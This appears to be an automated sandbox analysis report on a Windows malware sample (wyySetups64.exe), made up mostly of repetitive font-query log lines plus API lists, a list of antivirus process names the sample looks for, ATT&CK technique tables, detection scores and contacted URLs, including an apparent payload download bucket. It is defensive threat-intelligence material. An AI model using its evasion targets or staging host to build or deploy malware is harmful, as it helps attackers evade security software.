    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exe Code function: 0_2_100113E9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_100113E9
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_00B68A46 _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,8_2_00B68A46
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_03385D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_03385D22
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_03376A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,1_2_03376A70
    Source: wyySetups64.exeBinary or memory string: vsserv.exe
    Source: wyySetups64.exeBinary or memory string: avcenter.exe
    Source: wyySetups64.exeBinary or memory string: cfp.exe
    Source: 360instpatch.exeBinary or memory string: SuperKiller.exe
    Source: wyySetups64.exeBinary or memory string: rtvscan.exe
    Source: wyySetups64.exeBinary or memory string: TMBMSRV.exe
    Source: 360instpatch.exe, 00000008.00000003.1819390300.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
    Source: 360instpatch.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360Safe.exe
    Source: 360instpatch.exeBinary or memory string: \SuperKiller.exe
    Source: wyySetups64.exeBinary or memory string: avgwdsvc.exe
    Source: 360instpatch.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
    Source: 360instpatch.exeBinary or memory string: firstaid\superkiller.exe
    Source: 360instpatch.exeBinary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
    Source: wyySetups64.exeBinary or memory string: K7TSecurity.exe
    Source: wyySetups64.exeBinary or memory string: acs.exe
    Source: wyySetups64.exeBinary or memory string: kxetray.exe
    Source: wyySetups64.exeBinary or memory string: KSafeTray.exe
    Source: wyySetups64.exeBinary or memory string: avp.exe
    Source: 360instpatch.exeBinary or memory string: 360safe.exe
    Source: wyySetups64.exeBinary or memory string: 360Safe.exe
    Source: 360instpatch.exeBinary or memory string: 360tray.exe
    Source: wyySetups64.exeBinary or memory string: ashDisp.exe
    Source: wyySetups64.exeBinary or memory string: 360Tray.exe
    Source: wyySetups64.exeBinary or memory string: AYAgent.aye
    Source: wyySetups64.exeBinary or memory string: QUHLPSVC.EXE
    Source: wyySetups64.exeBinary or memory string: RavMonD.exe
    Source: wyySetups64.exeBinary or memory string: Mcshield.exe

    Stealing of Sensitive Information

    Source: Yara match File source: Process Memory Space: wyySetups64.exe PID: 3624, type: MEMORYSTR
    Source: C:\Users\user\Downloads\360instpatch.exe Device IO: \Device\Harddisk0\DR0

    Remote Access Functionality

    Source: Yara match File source: Process Memory Space: wyySetups64.exe PID: 3624, type: MEMORYSTR
    Source: C:\Users\user\Desktop\wyySetups64.exe Code function: 0_2_1000EE80 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,0_2_1000EE80
    Source: C:\Users\user\Desktop\wyySetups64.exe Code function: 0_2_00D5EE57 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,0_2_00D5EE57
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_6BF321AC socket,_memset,htonl,htonl,htons,htonl,bind,8_2_6BF321AC
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_6BF2FB95 htonl,bind,8_2_6BF2FB95
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_6BF2FEA4 listen,8_2_6BF2FEA4
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_6BF30BA3 listen,8_2_6BF30BA3
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
    Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 121 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
    Credentials | Domains | Default Accounts | 2 Native API | 1 Bootkit | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 223 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 121 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 1 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 246 System Information Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Masquerading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 361 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 141 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 13 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 223 Process Injection | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
    Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
    Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Indicator Removal | Keylogging | 1 System Network Configuration Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
    [Behavior graph] Behavior Graph ID: 1581895, Sample: wyySetups64.exe, Startdate: 29/12/2024, Architecture: WINDOWS, Score: 100

    Source | Detection | Scanner | Label | Link
    wyySetups64.exe | 0% | ReversingLabs | |
    wyySetups64.exe | 6% | Virustotal | | Browse

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\360instpatch[1].exe | 17% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll | 0% | ReversingLabs | |
    C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dll | 4% | ReversingLabs | |
    C:\Users\user\AppData\Roaming\wyySetups64.exe | 0% | ReversingLabs | |
    C:\Users\user\Downloads\360instpatch.exe | 17% | ReversingLabs | |
    No Antivirus matches
    No Antivirus matches
                                                                                                              unknown
                                                                                                              http://down.360safe.com/setup.exePathSOFTWARE360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, sites.dll.8.dr, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                high
                                                                                                                http://wpad.%s/wpad.dathttp://%s/wpad.datwpad360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.carterandcone.coml360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://pinst.360.cn/360safe/h_inst.cab?rd=36608336st.c360instpatch.exe, 00000008.00000002.4118556728.00000000046D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designers/frere-user.html360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://bbs.360.cn/thread-16079507-1-1.html360instpatch.exefalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://hao.360.cn/360instpatch.exefalse
                                                                                                                        high
                                                                                                                        http://www.symauth.com/rpa00360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774677766.0000000005960000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://down.360safe.com/h11=360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                              high
                                                                                                                              http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                high
                                                                                                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefin360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1844261692.000000000320E000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1836204024.0000000003018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.360.cn360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drfalse
                                                                                                                                    high
                                                                                                                                    http://123.com/360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                      high
                                                                                                                                      http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://down.360safe.com/setup.exe360instpatch.exefalse
                                                                                                                                        high
                                                                                                                                        http://pinst.360.cn/360safe/h_inst.cab?rd=36608336//VJ8360instpatch.exe, 00000008.00000002.4118275547.0000000004286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefi360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.fontbureau.com/designersG360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                              high
                                                                                                                                              http://www.fontbureau.com/designers/?360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.founder.com.cn/cn/bThe360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://ocsp.sectigo.com0wyySetups64.exe, wyySetups64.exe.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://sfdw.360safe.com/setup.exe.exe360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.fontbureau.com/designers?360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefin360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/soap/envelope/360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.360.cn/360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.tiro.com360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe0/wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
